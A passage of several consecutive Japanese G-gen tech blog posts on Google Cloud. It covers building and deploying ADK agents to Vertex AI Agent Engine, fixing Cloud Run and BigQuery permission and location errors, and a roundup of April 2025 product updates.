instruction=( "You are a helpful agent that answers tomorrow's weather for a specified city." "You are given the city name and the tomorrow's date as input." "Be sure to include the city name and tomorrow's date in the `%m月%d日` format and tomorrow's weather in your answer." "**the city name and the tomorrow's date**" "{tomorrow_date}" ), input_schema=DateOutput, tools=[google_search] ) instruction 内の {tomorrow_date} には、前の゚ヌゞェントの出力が埋め蟌たれたす。 input_schema=DateOutput ずするこずで、この AI ゚ヌゞェントに枡される入力デヌタのフォヌマットを DateOutput スキヌマに指定しおいたす。 tools に google_search を指定するこずで、Google 怜玢によるグラりンディングを行うこずができたす。 参考 : Built-in tools - Agent Development Kit Sequential agents による連結 最埌に、これらの AI ゚ヌゞェントを Sequential agents を甚いお連結し、䞀぀のワヌクフロヌずしお実行できるようにしたす。 from google.adk.agents import SequentialAgent root_agent = SequentialAgent( name= "tomorrows_date_agent" , sub_agents=[current_date_agent, tomorrows_date_agent, tomorrows_weather_agent] ) SequentialAgent の sub_agents に、実行したい゚ヌゞェントをリストずしお枡したす。リストの順番通りに゚ヌゞェントが実行され、前の゚ヌゞェントの出力が次の゚ヌゞェントの入力ずしお自動的に枡されたす。 動䜜怜蚌 ADK では、ロヌカルで䜜成した AI ゚ヌゞェントを簡単に怜蚌できる開発甚 UI が甚意されおいたす。この UI を立ち䞊げるたでの流れは、以䞋のドキュメントで玹介されおいたす。 参考 : Quickstart - Agent Development Kit この開発甚 UI を甚いお、䜜成した倩気予報゚ヌゞェントに「東京の明日の倩気を教えお」や「倧阪の明日の倩気を教えお」ずいったク゚リを投げお動䜜怜蚌を行いたす。 䞊郚Gemini アプリの回答 / 䞋郚䜜成した AI ゚ヌゞェントの回答 䜜成した AI ゚ヌゞェントの回答ず、Gemini アプリでの回答が共に同じ予報を返しおいるこずが確認できたした。これらの倀は、実際に各倩気予報サむトで発衚されおいる予報ずも合臎しおいたした。 堂原 竜垌 (蚘事䞀芧) クラりド゜リュヌション郚クラりド゚クスプロヌラ課。2023幎4月より、G-genにゞョむン。 Google Cloud Partner Top Engineer 2023, 2024, 2025に遞出 (2024幎はRookie of the year、2025幎はFellowにも遞出)。䌑みの日はだいたいゲヌムをしおいるか、時々自転車で遠出をしおいたす。 Follow @ryu_dohara
G-gen の歊井です。Cloud Run をデプロむする際、埓来アクセスできおいた Artifact Registry ぞの読み蟌みが゚ラヌになる事象に遭遇したしたので、圓蚘事ではその原因ず察凊方法に぀いお説明したす。 事象 事象の抂芁 環境構成 IAM ポリシヌ 原因 察凊方法 事象 事象の抂芁 これたで問題なく実行できおいた Cloud Run サヌビスぞのデプロむが、䜕も構成倉曎を行っおいないのにも関わらず、゚ラヌ終了したした。 Cloud Logging に蚘録されおいた゚ラヌログは以䞋の通りでした。 "message": "User must have permission to read the image, asia-northeast1-docker.pkg.dev/プロゞェクト ID/リポゞトリ名/むメヌゞ名:latest. Ensure that the provided container image URL is correct and that the above account has permission to access the image. If you just enabled the Cloud Run API, the permissions might take a few minutes to propagate. Note that the image is from project [プロゞェクト ID], which is not the same as this project [Cloud Run 偎のプロゞェクト ID]. Permission must be granted to the User from this project. See https://cloud.google.com/run/docs/deploying#other-projects \n Cause: 403 Forbidden\nGET https://asia-northeast1-docker.pkg.dev/v2/ プロゞェクト ID/リポゞトリ名/むメヌゞ名/manifests/latest \n{\"errors\":[{\"code\":\"DENIED\",\"message\":\"Permission \\"artifactregistry.repositories.downloadArtifacts\\" denied on resource \\"projects/プロゞェクト ID/locations/asia-northeast1/repositories/リポゞトリ名\\" (or it may not exist)\"}]}\n" 圓該環境では Cloud Run API が有効であり、リポゞトリ名にも間違いのないこずから、Cloud Run をデプロむするプリンシパルサヌビスアカりントに artifactregistry.repositories.downloadArtifacts が䞍足しおいるこずが原因ではないかず掚察されたした。 環境構成 圓゚ラヌが発生した際の環境構成は以䞋の通りです。 GitHub Actions で Artifact Registry に Docker むメヌゞをプッシュするずころたでは成功したしたが、そのむメヌゞを䜿っお Cloud Run サヌビスをデプロむする際に、゚ラヌが発生したした。 なお、GitHub Actions はサヌビスアカりントによる Workload Identity 連携を甚いおおり、埌述する暩限を付䞎しおいたした。 IAM ポリシヌ 圓事象が発生した際の IAM ポリシヌは、以䞋の通りでした。 # プリンシパル 事前定矩 IAM ロヌル ロヌル付䞎察象リ゜ヌス ① GitHub Actions 甚サヌビスアカりント Cloud Run デベロッパヌ roles/run.developer  Cloud Run をデプロむするプロゞェクト ② Cloud Run サヌビス゚ヌゞェント Artifact Registry 読み取り roles/artifactregistry.reader  Artifact Registry があるプロゞェクト むンフラ管理甚の GitHub Actions が䜿甚するサヌビスアカりントに぀いおは、Cloud Run デベロッパヌ以倖にも、各リ゜ヌスを管理する䞊で必芁最小限の事前定矩 IAM ロヌルを付䞎しおいたした。 たた、Cloud Run ず Artifact Registry が異なるプロゞェクトにある堎合は、Artifact Registry 読み取り暩限を Cloud Run サヌビス ゚ヌゞェントに付䞎する必芁がありたす。 参考 Cloud Run ぞのデプロむ 原因 圓事象の原因は、 Cloud Run の事前定矩 IAM ロヌルの仕様倉曎 でした。Google 偎で IAM ロヌルに関する仕様の倉曎があったため、埓来は問題なく動䜜しおいたオペレヌションが、゚ラヌを起こすようになっおしたったものです。 2024幎11月25日、Google から管理者あおにメヌルの䞀斉配信があり、Cloud Run のデプロむに䜿甚するこずができる事前定矩の IAM ロヌル「 Cloud Run 管理者  roles/run.admin 」や「 Cloud Run デベロッパヌ  roles/run.developer 」に 暗黙的に 付䞎されおいた Artifact Registory の読み取り暩限が順次削陀されるこずが発衚されたした。この倉曎は2025幎1月15日米囜時間以降、順次行われおいたす。 この仕様倉曎により、むメヌゞの参照・ダりンロヌドができなくなり、結果ずしお Cloud Run のデプロむが倱敗するようになりたした。 仕様倉曎に関する詳现は、以䞋の蚘事で詳しく解説しおいたす。 blog.g-gen.co.jp 察凊方法 今回の堎合、GitHub Actions で甚いるサヌビスアカりントに関連する IAM ポリシヌを以䞋のように修正①-2 を远加定矩するこずで、デプロむ゚ラヌを解消するこずができたした。 # プリンシパル 事前定矩 IAM ロヌル ロヌル付䞎察象リ゜ヌス ①-1 GitHub Actions 甚サヌビスアカりント Cloud Run デベロッパヌ roles/run.developer  Cloud Run をデプロむするプロゞェクト ①-2 GitHub Actions 甚サヌビスアカりント Artifact Registry 読み取り roles/artifactregistry.reader  Artifact Registry があるプロゞェクト ② Cloud Run サヌビス゚ヌゞェント Artifact Registry 読み取り roles/artifactregistry.reader  Artifact Registry があるプロゞェクト 歊井 祐介 (蚘事䞀芧) クラりド゜リュヌション郚クラりド゚ンゞニアリング課。 Google Cloud Partner Top Engineer 2025 遞出。 趣味はロヌドレヌスやサッカヌ芳戊、あずはゎルフず筋トレ。 Follow @ggenyutakei
G-gen の杉村です。2025幎4月のむチオシ Google Cloud旧称 GCPアップデヌトをたずめおご玹介したす。蚘茉は党お、蚘事公開圓時のものですのでご留意ください。 はじめに Google Cloud Next '25 が開催 IAM の基本ロヌルが刷新Preview BigQuery のナヌザヌ定矩関数UDFが Python に察応Preview BigQuery ML で 生成 AI 関数 AI.GENERATE_* が登堎Preview Vertex AI Agent Builder が AI Applications に改名 BigQuery マテリアラむズドビュヌのスマヌトチュヌニングが改善 Cloud Run が Identity-Aware ProxyIAPをネむティブにサポヌトPreview Google ドキュメントず Gmail の Help me write 機胜が日本語に察応 Gemini アプリの Deep Research で Gemini 2.5 Pro が利甚可胜に Gemini in BigQuery の料金䜓系が改定 Google Docs のコヌドブロックが远加のプログラミング蚀語に察応 Gemini 2.5 Flash が利甚可胜にPreview BigQuery に費甚ベヌスの CUD確玄利甚割匕が登堎 Google グルヌプが Looker グルヌプにミラヌできるように Firestore に確玄利甚割匕CUDが登堎 Compute Engine で C4D マシンタむプが登堎Preview BigQuery でク゚リごずに reservation を指定可胜にPreview BigQuery で Reservation-based fairness が利甚可胜にPreview デヌタキャンバスで Gemini assistant が利甚可胜にPreview 組織倖から共有されたファむルを開いたずきに譊告を衚瀺 NotebookLM の「音声抂芁」が日本語に察応 Google Vids がほずんどの゚ディションに付垯 Looker で Period-over-period measures前期比メゞャヌが利甚可胜に LookerGoogle Cloud Coreで手動バックアップが利甚可胜に Dataplex automatic discovery in BigQuery が GA はじめに 圓蚘事では、毎月の Google Cloud旧称 GCPや Google Workspace旧称 GSuiteのアップデヌトのうち、特に重芁なものをたずめたす。 たた圓蚘事は、Google Cloud に関するある皋床の知識を前提に蚘茉されおいたす。前提知識を埗るには、ぜひ以䞋の蚘事もご参照ください。 blog.g-gen.co.jp リンク先の公匏ガむドは、英語版で衚瀺しないず最新情報が反映されおいない堎合がありたすためご泚意ください。 Google Cloud Next '25 が開催 Google Cloud の旗艊むベントである Google Cloud Nextが、2025幎4月9日(æ°Ž)から11日(金)たでの3日間、米囜ラスベガスで開催。 キヌノヌトでは、重芁な技術アップデヌトが発衚された。 blog.g-gen.co.jp blog.g-gen.co.jp G-gen 瀟は、珟地から倚数のセッションレポヌトを発衚。関連蚘事は以䞋のリンクから参照。 blog.g-gen.co.jp IAM の基本ロヌルが刷新Preview Basic roles (2025-04-01) Google Cloud の基本ロヌルBasic rolesが新しくなるPreview。 旧 : Owner (roles/owner)、Editor (roles/editor)、Viewer (roles/viewer) 新 : Admin (roles/admin)、Writer (roles/writer)、Reader (roles/reader) 内容の詳现は、以䞋の解説蚘事も参照。 参考 : IAMの基本ロヌルがアップデヌト - G-gen Tech Blog BigQuery のナヌザヌ定矩関数UDFが Python に察応Preview User-defined functions in Python (2025-04-02) BigQuery のナヌザヌ定矩関数User-defined functions、UDFで Python がサポヌトされたPreview。 これたで BigQuery UDF で利甚できる蚀語は SQL ず JavaScript のみだったが、新たに Python が加わった。これにより、䜿い慣れた Python のラむブラリやロゞックを BigQuery のク゚リ内で盎接利甚できるようになり、より耇雑なデヌタ凊理や分析が可胜に。 BigQuery ML で 生成 AI 関数 AI.GENERATE_* が登堎Preview Generative AI functions (2025-04-04) BigQuery ML においお、Vertex AI の Gemini モデルを利甚しおテキスト分析を行い、指定されたデヌタ型で結果を返す新しい組み蟌み関数矀 AI.GENERATE_* が登堎Preview。 利甚可胜な関数は以䞋の通り。 AI.GENERATE_TEXT AI.GENERATE_BOOL AI.GENERATE_INT AI.GENERATE_DOUBLE AI.GENERATE_TABLE これらの関数の利甚で、SQL ク゚リ内で盎接、テキストからのキヌワヌド抜出、芁玄、感情分析などの自然蚀語凊理タスクを実行し、その結果を構造化デヌタずしお取埗するこずが容易になる。 -- AI.GENERATE を䜿甚した䟋 (キヌワヌド抜出) SELECT city, AI.GENERATE( ( ' Extract the key words from the text below: ' , city), connection_id => ' us.test_connection ' , endpoint => ' gemini-2.0-flash ' ).result FROM mydataset.cities; Vertex AI Agent Builder が AI Applications に改名 AI Applications release notes (2025-04-02) Vertex AI Agent Builder の名称が AI Applications に倉曎された。 Google Cloud コン゜ヌルや公匏ドキュメント䞊の衚蚘は、順次倉曎される。なお、API ゚ンドポむント名 discoveryengine.googleapis.com などは倉曎されない。 このサヌビスは、これたでにも䜕床か名称倉曎が行われおいる: Preview 時 : Generative AI App BuilderGen App Builder 2023幎8月GA 時: Vertex AI Search and Conversation 2024幎4月 : Vertex AI Agent Builder 2025幎4月 : AI Applications BigQuery マテリアラむズドビュヌのスマヌトチュヌニングが改善 Smart tuning (2025-04-07) BigQuery のマテリアラむズドビュヌにおけるスマヌトチュヌニング機胜が改善された。 スマヌトチュヌニングは、ク゚リ実行時にマテビュヌを利甚した方が効率が良い堎合に、BigQuery が自動的にク゚リを曞き換えおマテリアラむズドビュヌを参照する機胜。 これたでは、スマヌトチュヌニングが適甚されるためには、ク゚リ察象のベヌステヌブルずマテビュヌが同じデヌタセット内に存圚する必芁があったが、今回のアップデヌトにより、 同じプロゞェクト内 にあれば適甚されるように条件が緩和された。これにより、より倚くのク゚リでスマヌトチュヌニングによるパフォヌマンス向䞊が期埅できる。 Cloud Run が Identity-Aware ProxyIAPをネむティブにサポヌトPreview Configure Identity-Aware Proxy for Cloud Run (2025-04-07) Cloud Run サヌビスが Identity-Aware ProxyIAPをネむティブにサポヌトPreview。 これにより、倖郚ロヌドバランサヌを蚭定するこずなく、Cloud Run サヌビスぞのアクセスに察しお Google アカりント認蚌組織アカりントのみを簡単に適甚可胜に。埓来、Cloud Run で IAP を利甚するには倖郚 HTTPSロヌドバランサヌの蚭眮が必須だったが、このアップデヌトで構成が倧幅に簡玠化される。 ただし、以䞋の制限事項がある。 Google Workspace たたは Cloud Identity による組織Organizationが必芁 認蚌できるのは、同じ組織に所属する Google アカりントのみ カスタムドメむンを利甚する堎合は、匕き続きロヌドバランサヌが必芁 この機胜の詳现や蚭定方法に぀いおは、以䞋の蚘事も参照。 blog.g-gen.co.jp Google ドキュメントず Gmail の Help me write 機胜が日本語に察応 Help me write in Google Docs now available in four additional languages (2025-04-07) Help me write in Gmail now available in Japanese and Korean (2025-04-07) Google ドキュメントおよび Gmail に搭茉されおいる Gemini 機胜「Help me write」が日本語に察応。 この機胜を䜿うず、遞択したテキストに察しお、タむポの修正、文章のトヌン調敎長くする、短くする、フォヌマルにするなど、リフレヌズ蚀い換えなどを Gemini に指瀺できる。文章䜜成を効率化し、より質の高いドキュメントやメヌルを䜜成するのに圹立぀。 この機胜は、2025幎4月7日から順次ロヌルアりトされおおり、個人向け無償アカりントを陀くほが党おの Google Workspace ゚ディションで利甚可胜。 Gemini アプリの Deep Research で Gemini 2.5 Pro が利甚可胜に Google Gemini App 公匏 X アカりント (2025-04-09) Gemini りェブアプリの Gemini Advanced で利甚可胜な Deep Research 機胜においお、基盀モデルずしお Gemini 2.5 Pro が利甚可胜になった。 Deep Research は、䞎えられたトピックに぀いお Gemini が Web 䞊の情報を調査し、詳现なレポヌトを生成しおくれる機胜。より高性胜な Gemini 2.5 Pro が利甚可胜になったこずで、さらに質の高い調査レポヌトが期埅できる。 Gemini in BigQuery の料金䜓系が改定 Gemini in BigQuery Pricing Overview (2025-04-09) Gemini in BigQuery の料金䜓系が改定された。 埓来は Gemini Code Assist Enterprise たたは BigQuery Enterprise Plus ゚ディションの賌入が必芁だったが、新䜓系ではオンデマンドおよび党おの BigQuery ゚ディションで利甚可胜になった。 Google Docs のコヌドブロックが远加のプログラミング蚀語に察応 Google Docs code blocks now available in additional programming languages (2025-04-14) Google Docs のコヌドブロック機胜が、以䞋の远加プログラミング蚀語に察応。 C# Go Kotlin PHP Rust TypeScript HTML CSS XML JSON Protobuf Textproto SQL Bash/Shell Gemini 2.5 Flash が利甚可胜にPreview Gemini 2.5 Flash (2025-04-17) Vertex AI で Gemini 2.5 Flash が利甚可胜になったPreview。 テキスト、コヌド、画像、音声、動画を入力ずしお受け付け、テキストを出力する。思考に䜿うトヌクン数を制埡できる Thinking Budget 思考予算機胜があり、予算を0に蚭定するこずも可胜。 BigQuery に費甚ベヌスの CUD確玄利甚割匕が登堎 Committed use discounts (2025-04-21) BigQuery に「費甚ベヌスの確玄利甚割匕CUD」が登堎。1幎たたは3幎コミットで賌入するず、以䞋の SKU に割匕が適甚される。 BigQuery editions Composer 3BigQuery engine for Apache Airflow ずも呌ばれる BigQuery governance BigQuery services 割匕率は、1幎コミットで最倧10%、3幎コミットで最倧20%。 既存の Editions コミットメントの方が割匕率は高いが、この費甚ベヌス CUD は Composer や他の SKU にも適甚される点ず、リヌゞョン党䜓に適甚される点がメリット。 Google グルヌプが Looker グルヌプにミラヌできるように Mirror Google Groups (2025-04-22) LookerGoogle Cloud coreで、Google グルヌプの所属メンバヌを Looker のグルヌプにミラヌできるようになった。これにより、Looker 䞊で個別にナヌザヌを蚭定する手間が省力化できる。 Firestore に確玄利甚割匕CUDが登堎 Committed use discounts (2025-04-22) FirestoreNative mode / Datastore modeで費甚ベヌスの確玄利甚割匕CUDが登堎。Read/Write/Delete オペレヌション料金を1幎たたは3幎コミットメントで賌入するこずで割匕が適甚される。 1幎コミットメント : 20%割匕 3幎コミットメント : 40%割匕 この CUD は請求先アカりントに玐づく費甚ベヌスのものであり、党リヌゞョンに適甚される。 Compute Engine で C4D マシンタむプが登堎Preview C4D machine series (2025-04-22) Compute Engine で C4D マシンタむプが登堎Preview。 第5䞖代 AMD EPYC Turin プロセッサを搭茉し、Titanium アヌキテクチャを採甚。前䞖代の C3D ず比范しお性胜が 30% 向䞊したずされ、Cloud SQL for MySQL で 1 秒あたりのク゚リ数が 56% 増加、Memorystore for Redis ワヌクロヌドで 1 秒あたりのオペレヌション数が 38% 増加ずされる。※2025-04-24珟圚、Cloud SQL ではただ利甚できない点に泚意 Web アプリケヌション、ゲヌム、AI 掚論など、汎甚的な甚途を想定。 BigQuery でク゚リごずに reservation を指定可胜にPreview Flexibly assign reservations (2025-04-23) BigQuery で、ク゚リ実行時に䜿甚する reservation を明瀺的に指定できるようにPreview。 埓来はプロゞェクトに1぀だけ蚭定された reservation が䜿甚された。これによりプロゞェクトを䜜成せずに、より柔軟に reseration を利甚できるようになった。 BigQuery で Reservation-based fairness が利甚可胜にPreview Reservation-based fairness (2025-04-23) BigQuery で Reservation-based fairness が Preview。この機胜をオンにするず、アむドルスロットの分配方法が倉わる。詳现はドキュメントを参照。 デヌタキャンバスで Gemini assistant が利甚可胜にPreview Work with a Gemini assistant (2025-04-24) BigQuery デヌタキャンバスで Gemini assistant が利甚可胜にPreview。 自然蚀語で指瀺するず、察象テヌブルのサゞェスト、ク゚リ䜜成、グラフの描画など、デヌタ探玢から分析・可芖化たでGeminiがアシストしおくれる。Gemini はテヌブルのメタデヌタを読むため、メタデヌタ敎備が重芁。 組織倖から共有されたファむルを開いたずきに譊告を衚瀺 Enhance Your Organization’s Security with Out-of-Domain File Warnings in Google Workspace (2025-04-28) Google WorkspaceDocs、Sheets、Slidesで組織倖から共有されたファむルを開いたずきに譊告を出す蚭定が利甚可胜に。 デフォルトで有効化され、機密情報を誀っお蚘茉しないように、ずいう意味の譊告が出る。 画像は公匏から匕甚 NotebookLM の「音声抂芁」が日本語に察応 NotebookLM Audio Overviews are now available in over 50 languages (2025-04-29) NotebookLM でポッドキャスト颚音声を生成しお抂芁を説明する「音声抂芁」が日本語を含む50以䞊の蚀語に察応した。英語以倖の出力蚀語を指定できるようになり、流暢な日本語も生成可胜になった。 NotebookLM - 出力蚀語の指定 Google Vids がほずんどの゚ディションに付垯 Expanding Google Vids to Business Starter, Enterprise Starter and Nonprofit customers (2025-04-29) 動画線集ツヌル Google Vids が Google Workspace Business Starter、Enterprise Starter、無償アカりントでも䜿えるように。 12ヶ月間は AI 補助機胜も詊甚可胜。埓来は Business/Enterprise Standard 以䞊が必芁だった。 Looker で Period-over-period measures前期比メゞャヌが利甚可胜に Period-over-period measures in Looker (2025-04-29) Looker で Period-over-period measures前期比メゞャヌが利甚可胜に。昚察比をメゞャヌずしお簡単に䜜成できる。 以䞋は、LookML の定矩の䟋公匏ドキュメントから匕甚。 measure: order_count_last_year { type: period_over_period description: "Order count from the previous year" based_on: orders.count based_on_time: orders.created_year period: year kind: previous } LookerGoogle Cloud Coreで手動バックアップが利甚可胜に Back up and restore a Looker (Google Cloud core) instance (2025-04-29) LookerGoogle Cloud Coreで手動バックアップおよびリストアが可胜に。埓来は24時間ごずの自動バックアップのみだった。 内郚 DB 等のデヌタが保存される。珟圚では gcloud コマンドでのみ実斜可胜。 Dataplex automatic discovery in BigQuery が GA Discover and catalog Cloud Storage data (2025-04-29) Dataplex automatic discovery in BigQuery が Preview→GA。Cloud Storage バケットをスキャンしお構造化デヌタは BigLake table たたは External tableずしお、非構造化デヌタは Object table ずしお自動䜜成。 Parquet、Avro、ORC、JSONL、CSV や䞀郚の圧瞮圢匏に察応。 杉村 勇銬 (蚘事䞀芧) 執行圹員 CTO / クラりド゜リュヌション郚 郚長 元譊察官ずいう経歎を持぀珟 IT ゚ンゞニア。クラりド管理・運甚やネットワヌクに知芋。AWS 12資栌、Google Cloud認定資栌11資栌。X (旧 Twitter) では Google Cloud や AWS のアップデヌト情報を぀ぶやいおいたす。 Follow @y_sugi_it
G-gen の堂原です。本蚘事では Google Cloud の Agent Development Kit を甚いお開発した゚ヌゞェントを、 Vertex AI Agent Engine にデプロむし、呌び出す方法に぀いお玹介したす。 はじめに 本蚘事の趣旚 Agent Development Kit Agent Engine ADK を甚いた AI ゚ヌゞェント開発 Agent Engine ぞのデプロむ デプロむした AI ゚ヌゞェントの呌び出し AI ゚ヌゞェントの削陀 はじめに 本蚘事の趣旚 本蚘事では、 Agent Development Kit を䜿甚しお゚ヌゞェントを開発し、 Vertex AI Agent Engine にデプロむしお実際に呌び出すたでの䞀連の流れを、具䜓的なコヌドを亀えながら解説したす。 Agent Development Kit Agent Development Kit 以䞋、ADKは、Google Cloud が提䟛する、AI ゚ヌゞェントを構築するための Python ラむブラリです。ADK を䜿甚するこずで、゚ヌゞェントぞの関数凊理組み蟌みや倖郚ツヌルの利甚、マルチ゚ヌゞェントの実装が行えたす。 参考 : Agent Development Kit Agent Engine Vertex AI Agent Engine 以䞋、Agent Engineは、AI ゚ヌゞェントの実行環境を提䟛するフルマネヌゞドサヌビスです。 Agent Engine にはマルチタヌン実装のための セッション機胜 が組み蟌たれおおり、通垞 Gemini を甚いるずきのようにこれたでの䌚話履歎を郜床リク゚ストに含める必芁がありたせん。その他、 自動スケヌリング 機胜や VPC Service Controls による保護など、AI ゚ヌゞェントをプロダクトレベルで利甚しおいくための機胜が備わっおいたす。 2025幎5月珟圚、GUI は提䟛されおおらず、Python SDK たたは REST API を甚いお各皮操䜜を行う必芁がありたす。 参考 : Vertex AI Agent Engine の概要  |  Generative AI on Vertex AI  |  Google Cloud ADK を甚いた AI ゚ヌゞェント開発 題材ずしお、ナヌザが郜垂の名前を䞎えるず、その郜垂の珟圚時刻を回答する゚ヌゞェントを開発したす。以䞋のペヌゞで、ADK を甚いお AI ゚ヌゞェントを䜜成する手順が玹介されおいるので、それをベヌスずしおいたす。 参考 : Multi-tool agent - Agent Development Kit import datetime from zoneinfo import ZoneInfo, ZoneInfoNotFoundError from google.adk.agents import Agent def get_current_time (city: str ) -> dict : """Returns the current time in a specified city. Args: city (str): The IANA zone name of the city for which to retrieve the current time. Returns: dict: status and result or error msg. """ try : tz = ZoneInfo(city) now = datetime.datetime.now(tz) report = ( f 'The current time in {city} is {now.strftime("%Y-%m-%d %H:%M:%S %Z%z")}' ) return { "status" : "success" , "report" : report} except ZoneInfoNotFoundError: return { "status" : "error" , "error_message" : ( f "Sorry, I don't have timezone information for {city}." ), } root_agent = Agent( name= "city_time_agent" , model= "gemini-2.0-flash" , description=( "(Japanese) Agent to answer questions about the time in a city." ), instruction=( "You are a helpful agent who answers questions written in Japanese, responding in Japanese, about the time in a city." "First, obtain the IANA zone name for the city specified by the user." "Next, retrieve the current time in that city based on the IANA zone name." ), tools=[get_current_time], ) このコヌドでは、 Agent クラスのむンスタンスずしお root_agent を䜜成しおいたす。 model には gemini-2.0-flash を指定し、 tools には get_current_time 関数をリストずしお枡しおいたす。 instruction では、AI ゚ヌゞェントの振る舞いを指瀺しおいたす。 ADK で䜜成した AI ゚ヌゞェントは、関数ここでいう get_current_time の名前および docstring を元に呌び出すべき関数を刀断しおいるため、docstring は適切に蚘茉するこずが掚奚されたす。 参考 : Overview - Agent Development Kit Agent Engine ぞのデプロむ 開発した゚ヌゞェントの゜ヌスコヌドを、Agent Engine にデプロむしたす。デプロむにあたり、以䞋の゜ヌスコヌドを実行したす。 import vertexai from vertexai import agent_engines PROJECT_ID = "{プロゞェクトID}" LOCATION = "us-central1" STAGING_BUCKET = "gs://{バケット名}" vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) remote_app = agent_engines.create( display_name= "city_time_agent" , description= "(Japanese) Agent to answer questions about the time in a city." , agent_engine=root_agent, requirements=[ "google-cloud-aiplatform[adk,agent_engines]" ] ) STAGING_BUCKET には、AI ゚ヌゞェントをデプロむする際の䞭間ファむルを栌玍するために䜿われる Cloud Storage バケットを指定したす。 remote_app の display_name ず description はメタデヌタであり、デプロむする AI ゚ヌゞェントの挙動に圱響は䞎えたせん。 agent_engine で先ほどむンスタンス化した root_agent を指定し、 requirements に AI ゚ヌゞェントが必芁ずするラむブラリを蚘茉したす。 䞊蚘のコヌドを実行するず、出力の䞀郚ずしお以䞋が埗られたす。 Creating AgentEngine Create AgentEngine backing LRO: projects/{プロゞェクト番号}/locations/us-central1/reasoningEngines/{リ゜ヌスID}/operations/xxx この出力に含たれる {リ゜ヌスID} が、デプロむされた Agent Engine のリ゜ヌス ID ずなりたす。この ID は埌ほど゚ヌゞェントを呌び出す際に䜿甚したす。 デプロむした AI ゚ヌゞェントの呌び出し デプロむした AI ゚ヌゞェントを呌び出すには、たずその AI ゚ヌゞェントのむンスタンスを取埗したす。先ほど取埗したリ゜ヌス ID を䜿甚したす。 Agent Engine ぞのデプロむ埌にそのたた凊理を続ける堎合は本コヌドは䞍芁で、 agent_engines.create() の返り倀をそのたた利甚できたす。 remote_agent = agent_engines.get( "{リ゜ヌスID}" ) 参考 : エージェントを使用する  |  Generative AI on Vertex AI  |  Google Cloud 次に、取埗した AI ゚ヌゞェントに察しお新しいセッションを䜜成し、ク゚リを投げたす。以䞋のコヌドは、「東京の珟圚時刻を教えお䞋さい」ずいうク゚リを投げ、その結果をストリヌミングで受け取る䟋です。 user_id = "hoge" session = remote_agent.create_session(user_id=user_id) for event in remote_agent.stream_query( user_id=user_id, session_id=session[ "id" ], message= "東京の珟圚時刻を教えお䞋さい" , ): print (event) 参考 : Agent Development Kit エージェントを使用する  |  Generative AI on Vertex AI  |  Google Cloud 䞊蚘のコヌドを実行するず、以䞋のような出力が埗られたす。 {'content': {'parts': [{'function_call': {'id': 'xxx', 'args': {'city': 'Asia/Tokyo'}, 'name': 'get_current_time'}}], 'role': 'model'}, 'invocation_id': 'xxx', 'author': 'city_time_agent', 'actions': {'state_delta': {}, 'artifact_delta': {}, 'requested_auth_configs': {}}, 'long_running_tool_ids': [], 'id': xxx', 'timestamp': xxx} {'content': {'parts': [{'function_response': {'id': 'xxx', 'name': 'get_current_time', 'response': {'status': 'success', 'report': 'The current time in Asia/Tokyo is 2025-04-28 18:35:35 JST+0900'}}}], 'role': 'user'}, 'invocation_id': 'xxx', 'author': 'city_time_agent', 'actions': {'state_delta': {}, 'artifact_delta': {}, 'requested_auth_configs': {}}, 'id': 'xxx', 'timestamp': xxx} {'content': {'parts': [{'text': '東京の珟圚の時刻は2025-04-28 18:35:35 JST+0900です。'}], 'role': 'model'}, 'invocation_id': 'xxx', 'author': 'city_time_agent', 'actions': {'state_delta': {}, 'artifact_delta': {}, 'requested_auth_configs': {}}, 'id': 'xxx', 'timestamp': xxx} 3 ぀目の出力内に、AI ゚ヌゞェントの生成文が含たれおおり、東京の珟圚時刻が回答されおいるこずがわかりたす。たた、AI ゚ヌゞェントが get_current_time 関数を呌び出し、その結果に基づいお応答を生成しおいる様子が確認できたす。 同じ user_id ず session_id を䜿甚しおク゚リを投げ続けるこずで、マルチタヌンな䌚話も可胜です。 なお、今回はロヌカルで Python のコヌドを実行しお゚ヌゞェントを呌び出したしたが、Agent Engine にホストした゚ヌゞェントは、別のアプリケヌションやチャットツヌルなどから呌び出すこずが可胜です。たた、今埌は Gemini Enterprise旧称 Google Agentspaceなど他の Google サヌビスずの連携も匷化されおいくずみられおいたす。 AI ゚ヌゞェントの削陀 ゚ヌゞェントを削陀する前に、その゚ヌゞェントに関連付けられおいるすべおのセッションを削陀しおおく必芁がありたす。 以䞋のコヌドは、指定した user_id に関連付けられおいるすべおのセッションを削陀し、その埌゚ヌゞェント自䜓を削陀する䟋です。 user_id = "hoge" session_list = remote_agent.list_sessions(user_id=user_id) for session in session_list[ "sessions" ]: remote_agent.delete_session(user_id=user_id, session_id=session[ "id" ]) remote_agent.delete() 堂原 竜垌 (蚘事䞀芧) クラりド゜リュヌション郚クラりド゚クスプロヌラ課。2023幎4月より、G-genにゞョむン。 Google Cloud Partner Top Engineer 2023, 2024, 2025に遞出 (2024幎はRookie of the year、2025幎はFellowにも遞出)。䌑みの日はだいたいゲヌムをしおいるか、時々自転車で遠出をしおいたす。 Follow @ryu_dohara
G-gen の杉村です。BigQuery のスケゞュヌルされたク゚リScheduled queries機胜で定期的にパブリックデヌタセットからデヌタを転送しようずしたずころ、Access Denied が衚瀺されおしたいたした。原因ず察凊法を玹介したす。 事象 原因 察凊 事象 BigQuery のパブリックデヌタセット bigquery-public-data のテヌブルからデヌタを SELECT し、自分のプロゞェクトのテヌブルに INSERT する スケゞュヌルされたク゚リ Scheduled queriesを定矩したした。 参考 : ク゚リのスケゞュヌリング ク゚リを実行するず、以䞋の゚ラヌメッセヌゞが衚瀺されたした。 ゚ラヌメッセヌゞ Failed to start BigQuery job. Error: Access Denied: Table bigquery-public-data:samples.shakespeare: User does not have permission to query table bigquery-public-data:samples.shakespeare, or perhaps it does not exist. User: my-account@g-gen.co.jp. Please make sure the resource exists and follow http://cloud/iam/docs/granting-changing-revoking-access to grant permissions to the user. See required permissions in Transfer guides. 認蚌に䜿っおいるアカりントにはプロゞェクトレベルで BigQuery 管理者 roles/bigquery.admin ロヌルが付䞎されおおり、暩限は足りおいるはずです。 スケゞュヌルされたク゚リの蚭定は、他の成功しおいるク゚リず違いはないように芋えたす。 原因 スケゞュヌルされたク゚リを保存する際に、ゞョブ実行ロケヌションを us-central1 ずしたしたが、ク゚リで SELECT 察象ずしおいるパブリックデヌタセットは US マルチリヌゞョンに存圚しおいたす。このロケヌションの違いが原因でした。 BigQiuery ゞョブは、 実行ロケヌションず同じロケヌションのデヌタセットにしかアクセスできない ため、スケゞュヌルされたク゚リの実行が倱敗したのでした。 倱敗したク゚リ SELECT 察象のデヌタセット なお、 US マルチリヌゞョンず us-central1 